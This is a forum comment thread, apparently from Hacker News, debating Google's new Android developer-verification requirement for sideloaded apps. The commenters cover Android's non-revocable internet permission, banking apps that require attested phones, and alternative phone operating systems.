Define "normal people". Due to Chinese phones and sanctions and other geopolitical bullshit a significant part of the world is forced to use alternative app stores already. Yes, these people are very aware of "sideloading". (Due to Google's own previous moronic foot-shooting policy.)
> How can we fix this?
turn people onto sideloaded apps. show them Revanced and NewPipe, show them system-wide ad blockers and bloatware removal and every other thing Google doesn't want plebs to use.
people don't care about "apk side-loading," they care about apps. hook them on forbidden apps, and they'll raise hell when they can't side-load them anymore.
This is the solution.
It's like napster and torrenting. People dont care about the tech behind it - they care about the outcome.
It's just that the majority of normies dont even know it is possible (and didnt think an alternative exists to sideload).
Official announcement: https://android-developers.googleblog.com/2025/08/elevating-...
More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
It's never about security (at least not user's security). It's like you pointed out only about power and locking in customers. They don't care if your phone gets hacked or you bank account drained. They care about the bottom line. Android is fine. Google should have 2 layers if they're worried playstore 1 has only well vetted authors and apps. playstore 2 can be the free for all (mostly) of the current store. These could be two different apps or prominent tags. Choice is good, lock down is bad. Corporate does not like employees or customers to have freedom, that's why it's our duty to fire people like the current US regime who always side with corporations over customers.
This is a drastic response, but they didn't make up the security threat. Attackers convincing users to side-load malware is a thing.
https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...
The thing is that people sideloading good non-malware apps because they want to is also a thing, and all kinds of icky apps that abuse permissions but are still verified and installed through the Play Store are also a thing. This doesn't really change what is a thing. It just moves more stuff under Google's control.
security is the "Save the Children" of technology. It's not that there isn't a theoretical thing there, it's that in the real material sense, the actual actions taken are power grabs for control and suppression.
> Attackers convincing users to side-load malware is a thing.
Sure. It’s also not Google’s problem.
It’s not Victorinox’s problem of someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.
Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
If they don't do that then their reputation will suffer and governments might take notice. So, in practice, big companies do have to care about their users, not individually but in aggregate.
That's a bad analogy. No one is complaining about Google providing Android security updates.
This is like a car manufacturer preventing the installation of all unapproved aftermarket accessories by claiming they're protecting you from a stalker installing a tracker on your car.
I don’t actually think it’s that bad. If all of a sudden we started hearing an awful lot about Android phones having viruses, to the point where almost everyone had a friend who got a virus on their android. I think the market would actually shift. We’d probably see more people moving to iPhones.
> Car companies do care if their cars are easy to break into and will improve the security of newer models, even if any particular theft is not their fault.
Didn't Kia go over a decade without caring or improving until the Kia Boys stuff?
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
The ability to launch other apps can be put behind a permission screen too.
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
> Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app,
The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
Doesn't Windows have the same thing aka Code Signing?
https://www.electronforge.io/guides/code-signing/code-signin...
You can install unsigned apps on Windows just fine, maybe with one extra nag screen. Plenty of large open source projects don't sign their installers - VLC being one big example that many normal people use.
Play Protect is just spyware to monitor app usage & exploitation. It doesn't prevent or protect anything.
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
So KYC but C is “competition”.
And K is "kill".
There's a reason Google is targeting a few specific countries with this first. Malware from APKs downloaded from the internet is more prominent in some countries than in others. The governments themselves are asking for this because educating the public has turned out to be an impossible task for them.
Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".
The malware makers will use fake or stolen IDs.
Can you elaborate a little bit about this hidden internet access control setting?
You can deny internet to any specific app.
<uses-permission android:name="android.permission.INTERNET" />
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
You can deny it on Graphene OS.
Interesting, you can't deny it on stock Android? TIL. You can on LineageOS.
Even device owner (MDM) apps can't revoke that permission.
"Hidden" isn't exactly right. It's completely inaccessible, unless you use a custom ROM like LineageOS. But it is a real permission:
https://developer.android.com/develop/connectivity/network-o...
Force enabled, more like
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps
Of that they still refuse to sandbox the play store.
It's easy to see that there's a pattern on what they are copying from GrapheneOS.
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
> The main thing this permission would be used for would be blocking ads.
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what's it worth.
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
> I've never managed to find even a single PoC bypassing it
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.> would be a catastrophic change to the ecosystem.
Hey we were already on board with this, you don't have to convince us.
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
so? pop up a permission prompt. have the user confirm.
and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.
The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
> The internet permission is the only regular manifest permission you can't toggle in the settings.
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
The internet permission is exposed to the user, it just can't be revoked by the user. But that's true of like 100 other permissions, too. It's the default case that permissions are not revokable.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
I would really like to deny internet access for apps like mx player. The frequency of ads on that app once Times group bought is the worst I've seen in my entire life. One of the best video players on Android, ruined.
Some chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
The solution is easy, stop developing for closed platforms:
You now have options for cheap (less than $200) portable low energy devices:
1. PineTab-V, a linux on Risc-V tablet. (Got debian a few months back, still waiting for proper GPU support, usable but slow now)
2. uConsole, a linux cyberdeck with optional 4G. (Also has debian for 2711, 2712 and 3588 Compute Modules)
I'm not porting my games to Android, iOS, Switch or PlayStation. Only Windows/X86 and Linux/ARM+Risc-V.
No Linux/X86 to not encourage power waste after Windows gets too expensive to run on the client side.
You only need Android for banking, and Nokia G22 is/was also sub $200.
I am now creating a new Google account for each phone, that way you are not the product any more.
But can still operate in society.
The worst part is the Orwellian opening sentence they start with in their blog post [0]:
> You shouldn’t have to choose between open and secure
2+2=5
Truly the end of an era. I've spent nearly two decades buying Android phones because of a single checkbox in settings that let me have the freedom I consider essential to any computing device that I own.
In a way, it's liberating, I've missed out on a lot from the Apple ecosystem because of that checkbox. Maybe finally I can let go of it now the choice is out of my hands.
[0] https://android-developers.googleblog.com/2025/08/elevating-...
Very much my exact feelings. I had the first Android phone ever and even wrote my own APKs and enjoyed the freedom of the mobile platform that let me install my own software. But it's been close to 20 years and maybe it's time to check out the other side, as much as I despise Apple's locked down ecosystem.
I'd sooner get a Chinese phone that isn't "Google-certified" than reward this behaviour by giving $1000+ to the DRM OGs at Cupertino. Neither Apple nor Google are protecting users against the alleged data-stealing evils of Tiktok, so how exactly are they providing any kind of "user safety" by throwing up fees and red tape for small independent developers?
I'm also completely open to this. Google just made being not Google-certified a feature.
Maybe it is time to try Jolla as next phone:
https://jolla.com/
Just a note for readers that the Jolla C2 cellular modem only supports European bands, so if you're in the US you're out of luck on that front until they release a new model.
Jolla is trying to release a new model in 2026: https://forum.sailfishos.org/t/next-gen-jolla-phone/23882
If there's enough interest in US, then they may release it there, too.
Oh... I somehow missed this reading for 15 minutes through the site. Thank you!
I used it as my first phone some 10 years. I type this message on one. I like their perseverance, but the truth is it's declining in practical usability.
Edit: In EU, so (lack of) bands are not an issue for me.
Yes, I was checking this out! Sailfish with Android compat seems very compelling. The videos I saw on youtube showed a bit less polish than I'd prefer, but I'd be OK with that. But then I read up on the manufacturer they partnered with. Reeder, I believe? I ended up looking up some other devices they made and there seems to be build quality problems...I haven't seen reports like this for the Jolla C2, though, so I still might be tempted to purchase one just to see how it drives. Thanks for the recommendation!
So that's it then.
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
In time, you will only be able to access banking from your desktop using an approved OS and browser with attestation...
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully manages mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
A recent real life example:
You can apply for an HSBC Global Money Account if you have: […] The HSBC UK Mobile Banking app (Global Money is only available via the app)
From https://www.hsbc.co.uk/current-accounts/products/global-mone...
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
My bank’s app doesn’t even work or even install on my phone because the bank considers my phone too old. So if they suddenly required the app to log in, I simply wouldn’t be able to bank with them. So they would lose my checking, investment, and HSA business when I move to another bank.
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
What gp is saying is that to access banking form desktop will require an approved OS and attestation just like on mobile. The current state of affairs is that an approved OS and attestation are only required on mobile but not on desktop
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
I use the Signal fork Molly to get messages on multiple phones. One remains the primary and the others linked, but I get messages even if the primary is off.
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Is that a thing Google logins can be set to require? I _can_ use the Gmail app on a device for 2FA, I can also press "try another method" and use any 2FA app.
i do like how many apps are starting to play nice with 3rd party authenticators. i use ms authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
Not true for either my AIB or Wise account.
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
I mean, I'm sure it's true for some banks or financial services, but that's not really the same thing.
A dedicated app on a locked down OS is vastly more controllable than something like a browser that can do virtually whatever it wants.
Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Is it confirmed that we will even be able to disable this?
I never really got into "phone" progrmaming, always waiting for the shenanigans to die down. But somehow the shanigans have gotten worse and for a significant chunk of the world population, the phone is the only computation device they have at all.
I never got into it because I was convinced developers would refuse to give up control over distribution when Apple started doing it. I wish I was right, but here we are.
Developers sometimes seem to be as in control as farmers are of the distribution of their produce. There's no absolute rule that gives the owners of large scale distribution networks power over both producer and consumer. It's just laws of convenience. It's easier for everyone to go through a few or just a single common broker.
There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It limits choice. I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem. That means fewer mobile apps even if distribution networks change tomorrow.
> I don’t have any experience building mobile apps because I didn’t want to buy into an unfair ecosystem
Seems like it wouldn't be much of a stretch to compare that statement to not starting a business because the economy is unfair. People indeed don't start businesses when the bureaucratic or tax overhead outweighs the financial benefit, but nobody loses sleep over an individual's hypothetical missed opportunity to learn a new skill but them. Doesn't matter to the platform owners unless it also stops being profitable, so it's their job to maintain the profitability for their ecosystem despite whatever barriers they put up.
> There's no law against a more democratic way to implement the broker either but it requires interesting methods of coordination and/or decision making that doesn't seem to exist yet?
It's not enough to not have a law against it, we need to have and enforce laws requiring it.
Some developers did. Others, who didn't care so much, got into the app store instead, and got rich off it. Users didn't care about such principles and mobile-first has been a viable strategy for a long time now. Not having something of an app is a problem if you want to stay in many markets.
Money is a powerful motivator. For better or worse.
Developers want a stable, secure platform where they can reach customers that trust the platform and are willing to transact. Everything is downstream of that, including any philosophy around control.
Developers are businesses and the economics need to work. For that, safety and security is much more important than openness.
Oh! Classic Survivorship bias. You're only looking at the devs who went into business in the phone ecosystem in the first place. I'm thinking that they're there despite the barriers to entry ('shenanigans'), and the ones you encounter happen to be those who happen to place a higher value on 'other values'. As the ecosystem gets locked down more, this effect becomes stronger.
Meanwhile, you're not looking at those who left, or those who decided to never enter a broken market dominated by players convicted of monopolistic practices.
This seems much more intuitive than a hypothesis where somehow people would prefer to enter a closed market over a fair and open market with no barriers to entry.
Remember, monopolists succeed because they are distorting the market, not because they are in fact the most efficient competitor.
* https://en.wikipedia.org/wiki/Survivorship_bias
You now need to have an online account to setup and login on a Windows desktop. It's obvious what the trend is and it's not allowing consumers control over their stuff.
Not related to the OP, but no you don't.
Just look up how to skip the "OOTB (out of the box) experience" and you can still bypass having to set up a cloud account on Windows 11 and can just set up a local account like normal. :)
I have been a computer user, developer and a system administrator for longer than I care to recount. I don't like Windows and I don't use it at work or home. But I do encounter it from time to time, and the experience is worse each time. The last time it happened, I couldn't figure out the way to skip/bypass the cloud account set up. Would it have been possible if I tried harder, starting with a web search? Perhaps. But there is no way an average system user is going to have the patience or often the skill necessary to do it. I'm not challenging their intelligence. But people have other priorities than to jump through a dozen hoops just to preserve privacy. I would do the same if I had to set up a Windows system for urgent work.
These sorts of hurdles exist to push more and more users to their favorite workflow until the dissenting voice is too feeble to notice when they finally pull the plug on the straightforward method. The intent is certainly there, since they are quite evidently boiling the frog. Just wait for the fine day when you wake up in the morning to see an HN story just like this one about Windows login as well.
Last I checked, Microsoft was trying to get rid of it.
https://www.tomshardware.com/software/windows/microsoft-elim...
It's still possible to set up using only a local account, but who knows for how long.
A stepping stone on a path.
Have a login. Pin features to a login. Mandate a login but w/ backdoor. Close the back door. "It's a backdoor, why not use the front door?"
For now. History has shown that workarounds for defaults tend to stop working at some point.
Software distribution control didn't start with phones, it started with game consoles.
The Nazis were initially quite squeamish about taking the lives of innocent civilians. It was in 1939 that a Nazi supporter wrote to Hitler requesting permission to euthanize his severely disabled infant son [1], who he described as 'a monster'. Hitler send his personal physician Karl Brandt to Leipzig to assess the situation. Upon confirmation, Hitler personally authorized Brandt to arrange the euthanasia, with the promise to protect him legally. Don't forget that these were the Nazis, the original.
Once that happened, they gradually tried the idea with other disabled children, eventually progressing to deceiving the parents to get the permission. Then it got extended to teenagers and eventually adults, including disabled war veterans. Then there was a backlash and it stopped for a while. But it reappeared eventually, this time on an industrialized scale - the final solution. Disabilities were not the limit anymore. Arguably the worst genocide in human history started with the reluctant murder of a 5 month old infant, just 6 years before reaching its peak at the end of the war.
This is the classic example of a slippery slope. One hesitant misstep is the beginning. But as they realize its benefits (to them), they double down and gradually expand the scope until nothing is exempted. The consumer electronics industry and the software industry are certainly no exceptions to this. Is it too dramatic and hyperbolic to compare them to the Nazis? Admittedly, a bit. But perhaps it's not a bad idea to shame them like that, because clearly nothing else is working (with all due respects to the victims of the original). And it's not like they hesitate to shame us when it suits them.
[1] Gerhard Herbert Kretschmar (20 February 1939 – 25 July 1939): https://en.wikipedia.org/wiki/Gerhard_Kretschmar
Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bulllshit to me. The vast majority of reasoning for why the judiciary makes the decisions it does is because of "precedent". Slippery slope is how the world operates. It surfaces everywhere, and when the slope we're sliding down matters, like this one, we have to fight back with fervor. Google isn't doing this in a vacuum; they're doing this because there's precedent for it, and because all they want is to assert more power over the world.
Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable. Everyone who even glances near this decision should feel overwhelming shame. If you have a shred of political power to fight this internally, you are a failure to yourself, your customers, and the world if you choose to stay silent. They'll read comments like these and think "we're right, we're being brave", because they have convinced themselves that there is bravery in wielding overwhelming power against their users.
> Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bulllshit to me.
I don't know if I got this wrong, but the 'slippery slope' argument by itself never appeared to be a logical fallacy to me. There are numerous valid examples of it, and that's the context of its use in my previous reply. There certainly is a 'slippery slope' logical fallacy, but I thought it meant that you are misapplying/misusing the slippery slope argument where it isn't valid or doesn't apply.
> Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable.
I was going to apply the Nazi label on them everyone else who use such sleazy tactics. I hesitated because a lot of people are still emotional about the holocaust (it has been 80 years) and object to equating anything with Nazism. But I sometimes wonder if the objection is meant only to silence the critics. While their actions haven't yet reached the magnitude of atrocities committed by the Nazis, their actions certainly are consistent with the Nazi tactics. Besides, it's not as if they had any qualms labeling ordinary people 'Pirates' for sharing media. Therefore I feel it's quite appropriate to apply to them and promote the label of 'Supply Side Nazis'.
i made and released some apps in the early days. Got tired of it and got tired of the reminders from google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps i haven't touched in decade are no longer compatible etc.
so much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
Got tired of this with a few extensions I made too. It felt like every year or so they'd completely break some API and I'd have to go switch to the new one, then they wanted a privacy policy, then justification for permissions, etc etc. Wasn't worth the trouble eventually and I just let them die.
I got into it then got out. Everything about the Apple ecosystem was infuriating. I don't even care about the ideology here, just the annoyance.
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am a I misremembering and/or has something changed in this process? Am I missing something?
Not just difficult - it becomes impossible. You can no longer develop any android app without Google's approval, just like iOS. The official emulators might not even work.
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to setup Android signing keys and needing to provide ID is not fun. It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
Get rid of those pesky open source guys, keep the merchants who want $$$ and can pay $ to Google.
They are namespacing, like it or not, and clearly they don't care about open-source that much.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a google-appproved one, and alternatives still are decades behind in terms of app ecosystem.
I think they might just get away with it.
Don’t worry though, the TPM requirements in everything are for your protection.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
If you don't mind sharing, which country is that?
It takes less time to search and find that Anatel is the Brazilian telecom agency than it does to type that comment.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
But now I do not have to google that.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Image asking someone where they’re from only to be told a US state, and only the state.
Apart from Georgia, I don't see how this could be a problem
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
Funny thing is that americans do that all the time, even in international settings like a coworking space full of expats. Everybody introducing themselves with a "hi, I'm from this country", except americans telling their state or city. Are they expecting us to be familiar with their geography, or just unaware of alternative geographical frames of reference?
Do you assume everybody is able to recognize Americans or Europeans "from their accent" ?
Americans? Honestly, yes. If not, what good is this cultural imperialism after all?
I'd think passive recognition of a fair few states would be a pretty low bar for relatively educated, English-speaking people. It's a pretty low bar, just placing a region with its country. People also regularly just assume that level of knowledge for globally- or culturally-relevant cities.
Maybe I think too highly of people, but I'd also imagine most would be able to get say... 6/10 right, for which countries the following list is from:
- Flanders
- Nova Scotia
- Brandenburg
- Guangzhou
- Tasmania
- Minas Gerais
- Catalonia
- Chechnya
- West Bengal
- Bali
> Image asking someone where they’re from only to be told a US state, and only the state.
Atlanta or Tbilisi?
> mandate weird Brazilian Android games on the phone I bought in Brazil.
Uhm, this sounds more like something from the Ministry of Culture, maybe some tax incentive for manufacturers promoting local productions.
I could be wrong though. Curious to know if Anatel has issued any ordinance in this regard, just did a quick search but could find nothing so far.
When I google ANATEL, it comes up as Brazil
Unless they give F-Droid access, the antitrust prosecution will double.
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
And go where? IOS is worse as far as openness and controlling your own hardware. And the Linux phones are not exactly practical for normal use.
If I can't run F-Droid and termux and all that, I have no need for Android supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
I’ve been daily driving a Librem 5 for two years. It’s not compelling, but I’m surprised at how little all those tiny inconveniences matter in the long run.
I think we tend to underestimate our ability to get used to stuff.
I suspect that many developers publishing on F-Droid, and the F-Droid itself, may obtain registration, and continue to be available, termux and all.
But not every developer, of course, would agree to register.
There are so many apps which just work and don't need updates.
All of those will disappear also on F-Droid because of that.
If both phone OS's are going to be the exact same on user choice then you might as well compare the two on their merits and this is not a comparison Android wins.
You forgot "IMO"
I rely on fdroid and am not sure what I'll do with this pixel 6a. I sometimes root, sometimes don't but I may have to get on the lineageos program full time. And I'm hoping for a rumored last batch of pinephone pro phones to be available later this month although I have no illusions about it being a real daily driver.
LineageOS currently says that it won't install over the latest update on the 6a.
You can try it, but don't cry if it bricks.
The newish one I bought got GrapheneOS instead. That worked without a hitch, but it's got more than a few problems.
What problems are you running into on Graphene OS? Maybe we have different workflows, but it works just fine for my purposes.
fdroid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributer:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
Ditch Google for what?
I responded elsewhere, but to summarize:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
An unofficial build of Android, like Grapheneos. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
